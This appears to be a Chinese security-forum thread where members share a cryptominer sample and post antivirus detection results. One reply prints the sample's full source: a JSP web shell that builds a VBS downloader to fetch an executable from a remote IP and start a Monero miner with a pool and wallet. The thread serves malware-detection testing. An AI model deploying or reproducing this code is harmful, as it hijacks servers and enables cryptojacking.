收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 挖矿一枚
123下一页
返回列表 发新帖
查看: 1879|回复: 23
收起左侧

[病毒样本] 挖矿一枚

[复制链接]
aikafans
发表于 2023-7-14 11:59:26 | 显示全部楼层 |阅读模式
目前过360、avast、adaware、eset、symantec

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

nikonikoni
发表于 2023-7-14 12:01:26 | 显示全部楼层
本帖最后由 nikonikoni 于 2023-7-14 12:09 编辑
  1. ->||<-<%@ page language="java" import="java.io.*" pageEncoding="UTF-8"%><%String path = request.getContextPath();String basePath = request.getScheme() + "://"+ request.getServerName() + ":" + request.getServerPort()+ path + "/";%><html><head><title>shell</title></head><body><%String cmds = "monitor.sh";try {Process process;process = Runtime.getRuntime().exec("cmd /c echo Set xPost = CreateObject("Microsoft.XMLHTTP") > hu4.vbs&@echo xPost.Open "GET","http://172.104.190.64:8220/3.exe",0 >> hu4.vbs&@echo xPost.Send() >> hu4.vbs&@echo        Set sGet = CreateObject("ADODB.Stream") >> hu4.vbs&@echo sGet.Mode = 3 >> hu4.vbs&@echo sGet.Type = 1 >> hu4.vbs&@echo sGet.Open() >>hu4.vbs&@echo sGet.Write(xPost.responseBody) >>hu4.vbs&@echo sGet.SaveToFile "3.exe",2 >>hu4.vbs&@cscript hu4.vbs&@start 3.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x");InputStreamReader ir = new InputStreamReader(process.getInputStream());LineNumberReader input = new LineNumberReader(ir);String line;process.waitFor();while ((line = input.readLine()) != null){out.print(line);out.print("<br/>");}if(input!=null){input.close();}} catch (Exception e) {e.printStackTrace();}%></body></html>
复制代码


直接拿这个试罢,后缀jsp
回复

举报

GreatMOLA
发表于 2023-7-14 12:05:09 | 显示全部楼层
事件: 无法处理
用户: MOLA-LAPTOP
用户类型: 活动用户
组件: 病毒扫描
结果: 未处理
结果说明: 未处理
类型: 可能会被入侵者利用以破坏您的计算机或个人数据的合法软件
名称: not-a-virus:HEUR:RiskTool.Script.BitMiner.gen
精确度: 启发式分析
威胁级别: 低
对象类型: 文件
对象名称: 1505493750.jsp
对象路径: D:\edge download\挖矿\b113cafcc86a8691d7721c74e42faa8ce1dcd939a1a0cd8eb819bbfbab362af0\b113cafcc86a8691d7721c74e42faa8ce1dcd939a1a0cd8eb819bbfbab362af0//
对象的 MD5: E1E788D46BF01883FE8ED5D92C6D36DF
原因: 已跳过
回复

举报

风雷max
发表于 2023-7-14 12:30:06 | 显示全部楼层
BDIS
挖矿\b113cafcc86a8691d7721c74e42faa8ce1dcd939a1a0cd8eb819bbfbab362af0\b113cafcc86a8691d7721c74e42faa8ce1dcd939a1a0cd8eb819bbfbab362af0=>1505493750.jsp Application.BitCoinMiner.RD
回复

举报

hhhq316
头像被屏蔽
发表于 2023-7-14 14:07:21 | 显示全部楼层
EMSI

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

喀反
发表于 2023-7-14 15:08:03 | 显示全部楼层
360 kill
回复

举报

aikafans
 楼主| 发表于 2023-7-14 15:36:24 | 显示全部楼层
hhhq316 发表于 2023-7-14 14:07
EMSI

eek么?我用eek好像一开始也不行
回复

举报

123456aaaafsdeg
发表于 2023-7-14 15:36:45 | 显示全部楼层
GD 1X
APEX  Unable to scan
ADAWARE MISSED
T3 MISSED
360 1X
回复

举报

hhhq316
头像被屏蔽
发表于 2023-7-14 15:41:14 | 显示全部楼层
aikafans 发表于 2023-7-14 15:36
eek么?我用eek好像一开始也不行

不是EEK,EMSI家庭版
回复

举报

aikafans
 楼主| 发表于 2023-7-14 15:44:25 | 显示全部楼层
hhhq316 发表于 2023-7-14 15:41
不是EEK,EMSI家庭版

那确实不一样,eek一开始没检测出来
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 04:34 , Processed in 0.117056 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表